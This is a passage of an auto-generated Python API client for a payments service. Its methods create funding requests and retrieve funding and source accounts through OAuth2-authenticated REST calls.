number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id', 'funding_request_v2'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_funding_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `create_funding_request`") # noqa: E501
# verify the required parameter 'funding_request_v2' is set
if ('funding_request_v2' not in local_var_params or
local_var_params['funding_request_v2'] is None):
raise ApiValueError("Missing the required parameter `funding_request_v2` when calling `create_funding_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'funding_request_v2' in local_var_params:
body_params = local_var_params['funding_request_v2']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v2/sourceAccounts/{sourceAccountId}/fundingRequest', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_funding_request_v3(self, source_account_id, funding_request_v3, **kwargs): # noqa: E501
"""Create Funding Request # noqa: E501
Instruct a funding request to transfer funds from the payor’s funding bank to the payor’s balance held within Velo (202 - accepted, 400 - invalid request body, 404 - source account not found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_funding_request_v3(source_account_id, funding_request_v3, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param FundingRequestV3 funding_request_v3: Body to included amount to be funded (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_funding_request_v3_with_http_info(source_account_id, funding_request_v3, **kwargs) # noqa: E501
def create_funding_request_v3_with_http_info(self, source_account_id, funding_request_v3, **kwargs): # noqa: E501
"""Create Funding Request # noqa: E501
Instruct a funding request to transfer funds from the payor’s funding bank to the payor’s balance held within Velo (202 - accepted, 400 - invalid request body, 404 - source account not found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_funding_request_v3_with_http_info(source_account_id, funding_request_v3, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param FundingRequestV3 funding_request_v3: Body to included amount to be funded (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id', 'funding_request_v3'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_funding_request_v3" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `create_funding_request_v3`") # noqa: E501
# verify the required parameter 'funding_request_v3' is set
if ('funding_request_v3' not in local_var_params or
local_var_params['funding_request_v3'] is None):
raise ApiValueError("Missing the required parameter `funding_request_v3` when calling `create_funding_request_v3`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'funding_request_v3' in local_var_params:
body_params = local_var_params['funding_request_v3']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v3/sourceAccounts/{sourceAccountId}/fundingRequest', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_funding_account(self, funding_account_id, **kwargs): # noqa: E501
"""Get Funding Account # noqa: E501
Get Funding Account by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_account(funding_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str funding_account_id: (required)
:param bool sensitive:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FundingAccountResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_funding_account_with_http_info(funding_account_id, **kwargs) # noqa: E501
def get_funding_account_with_http_info(self, funding_account_id, **kwargs): # noqa: E501
"""Get Funding Account # noqa: E501
Get Funding Account by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_account_with_http_info(funding_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str funding_account_id: (required)
:param bool sensitive:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FundingAccountResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['funding_account_id', 'sensitive'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_funding_account" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'funding_account_id' is set
if ('funding_account_id' not in local_var_params or
local_var_params['funding_account_id'] is None):
raise ApiValueError("Missing the required parameter `funding_account_id` when calling `get_funding_account`") # noqa: E501
collection_formats = {}
path_params = {}
if 'funding_account_id' in local_var_params:
path_params['fundingAccountId'] = local_var_params['funding_account_id'] # noqa: E501
query_params = []
if 'sensitive' in local_var_params:
query_params.append(('sensitive', local_var_params['sensitive'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v1/fundingAccounts/{fundingAccountId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FundingAccountResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_funding_account_v2(self, funding_account_id, **kwargs): # noqa: E501
"""Get Funding Account # noqa: E501
Get Funding Account by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_account_v2(funding_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str funding_account_id: (required)
:param bool sensitive:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FundingAccountResponse2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_funding_account_v2_with_http_info(funding_account_id, **kwargs) # noqa: E501
def get_funding_account_v2_with_http_info(self, funding_account_id, **kwargs): # noqa: E501
"""Get Funding Account # noqa: E501
Get Funding Account by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_account_v2_with_http_info(funding_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str funding_account_id: (required)
:param bool sensitive:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FundingAccountResponse2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['funding_account_id', 'sensitive'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_funding_account_v2" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'funding_account_id' is set
if ('funding_account_id' not in local_var_params or
local_var_params['funding_account_id'] is None):
raise ApiValueError("Missing the required parameter `funding_account_id` when calling `get_funding_account_v2`") # noqa: E501
collection_formats = {}
path_params = {}
if 'funding_account_id' in local_var_params:
path_params['fundingAccountId'] = local_var_params['funding_account_id'] # noqa: E501
query_params = []
if 'sensitive' in local_var_params:
query_params.append(('sensitive', local_var_params['sensitive'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v2/fundingAccounts/{fundingAccountId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FundingAccountResponse2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_funding_accounts(self, **kwargs): # noqa: E501
"""Get Funding Accounts # noqa: E501
Get the funding accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_accounts(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str payor_id:
:param str source_account_id:
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page
:param str sort: List of sort fields (e.g. ?sort=accountName:asc,name:asc) Default is accountName:asc The supported sort fields are - accountName, name and currency.
:param bool sensitive:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ListFundingAccountsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_funding_accounts_with_http_info(**kwargs) # noqa: E501
def get_funding_accounts_with_http_info(self, **kwargs): # noqa: E501
"""Get Funding Accounts # noqa: E501
Get the funding accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_accounts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str payor_id:
:param str source_account_id:
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page
:param str sort: List of sort fields (e.g. ?sort=accountName:asc,name:asc) Default is accountName:asc The supported sort fields are - accountName, name and currency.
:param bool sensitive:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ListFundingAccountsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['payor_id', 'source_account_id', 'page', 'page_size', 'sort', 'sensitive'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_funding_accounts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if 'page_size' in local_var_params and local_var_params['page_size'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_funding_accounts`, must be a value less than or equal to `100`") # noqa: E501
if 'page_size' in local_var_params and local_var_params['page_size'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_funding_accounts`, must be a value greater than or equal to `1`") # noqa: E501
if 'sort' in local_var_params and not re.search(r'[a-zA-Z]+[:desc|:asc]', local_var_params['sort']): # noqa: E501
raise ApiValueError("Invalid value for parameter `sort` when calling `get_funding_accounts`, must conform to the pattern `/[a-zA-Z]+[:desc|:asc]/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'payor_id' in local_var_params:
query_params.append(('payorId', local_var_params['payor_id'])) # noqa: E501
if 'source_account_id' in local_var_params:
query_params.append(('sourceAccountId', local_var_params['source_account_id'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'page_size' in local_var_params:
query_params.append(('pageSize', local_var_params['page_size'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'sensitive' in local_var_params:
query_params.append(('sensitive', local_var_params['sensitive'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v1/fundingAccounts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListFundingAccountsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_funding_accounts_v2(self, **kwargs): # noqa: E501
"""Get Funding Accounts # noqa: E501
Get the funding accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_accounts_v2(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str payor_id:
:param str name: The descriptive funding account name
:param str country: The 2 letter ISO 3166-1 country code (upper case)
:param str currency: The ISO 4217 currency code
:param FundingAccountType type: The type of funding account.
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page
:param str sort: List of sort fields (e.g. ?sort=accountName:asc,name:asc) Default is accountName:asc The supported sort fields are - accountName, name.
:param bool sensitive:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ListFundingAccountsResponse2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_funding_accounts_v2_with_http_info(**kwargs) # noqa: E501
def get_funding_accounts_v2_with_http_info(self, **kwargs): # noqa: E501
"""Get Funding Accounts # noqa: E501
Get the funding accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_accounts_v2_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str payor_id:
:param str name: The descriptive funding account name
:param str country: The 2 letter ISO 3166-1 country code (upper case)
:param str currency: The ISO 4217 currency code
:param FundingAccountType type: The type of funding account.
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page
:param str sort: List of sort fields (e.g. ?sort=accountName:asc,name:asc) Default is accountName:asc The supported sort fields are - accountName, name.
:param bool sensitive:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ListFundingAccountsResponse2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['payor_id', 'name', 'country', 'currency', 'type', 'page', 'page_size', 'sort', 'sensitive'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_funding_accounts_v2" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if 'page_size' in local_var_params and local_var_params['page_size'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_funding_accounts_v2`, must be a value less than or equal to `100`") # noqa: E501
if 'page_size' in local_var_params and local_var_params['page_size'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_funding_accounts_v2`, must be a value greater than or equal to `1`") # noqa: E501
if 'sort' in local_var_params and not re.search(r'[a-zA-Z]+[:desc|:asc]', local_var_params['sort']): # noqa: E501
raise ApiValueError("Invalid value for parameter `sort` when calling `get_funding_accounts_v2`, must conform to the pattern `/[a-zA-Z]+[:desc|:asc]/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'payor_id' in local_var_params:
query_params.append(('payorId', local_var_params['payor_id'])) # noqa: E501
if 'name' in local_var_params:
query_params.append(('name', local_var_params['name'])) # noqa: E501
if 'country' in local_var_params:
query_params.append(('country', local_var_params['country'])) # noqa: E501
if 'currency' in local_var_params:
query_params.append(('currency', local_var_params['currency'])) # noqa: E501
if 'type' in local_var_params:
query_params.append(('type', local_var_params['type'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'page_size' in local_var_params:
query_params.append(('pageSize', local_var_params['page_size'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'sensitive' in local_var_params:
query_params.append(('sensitive', local_var_params['sensitive'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v2/fundingAccounts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListFundingAccountsResponse2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_source_account(self, source_account_id, **kwargs): # noqa: E501
"""Get details about given source account. # noqa: E501
Get details about given source account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_account(source_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SourceAccountResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_source_account_with_http_info(source_account_id, **kwargs) # noqa: E501
def get_source_account_with_http_info(self, source_account_id, **kwargs): # noqa: E501
"""Get details about given source account. # noqa: E501
Get details about given source account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_account_with_http_info(source_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SourceAccountResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_source_account" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `get_source_account`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v1/sourceAccounts/{sourceAccountId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SourceAccountResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_source_account_v2(self, source_account_id, **kwargs): # noqa: E501
"""Get details about given source account. # noqa: E501
Get details about given source account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_account_v2(source_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SourceAccountResponseV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_source_account_v2_with_http_info(source_account_id, **kwargs) # noqa: E501
def get_source_account_v2_with_http_info(self, source_account_id, **kwargs): # noqa: E501
"""Get details about given source account. # noqa: E501
Get details about given source account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_account_v2_with_http_info(source_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SourceAccountResponseV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_source_account_v2" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `get_source_account_v2`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v2/sourceAccounts/{sourceAccountId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SourceAccountResponseV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_source_account_v3(self, source_account_id, **kwargs): # noqa: E501
"""Get details about given source account. # noqa: E501
Get details about given source account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_account_v3(source_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SourceAccountResponseV3
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_source_account_v3_with_http_info(source_account_id, **kwargs) # noqa: E501
def get_source_account_v3_with_http_info(self, source_account_id, **kwargs): # noqa: E501
"""Get details about given source account. # noqa: E501
Get details about given source account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_account_v3_with_http_info(source_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SourceAccountResponseV3, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_source_account_v3" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `get_source_account_v3`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v3/sourceAccounts/{sourceAccountId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SourceAccountResponseV3', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_source_accounts(self, **kwargs): # noqa: E501
"""Get list of source accounts # noqa: E501
List source accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
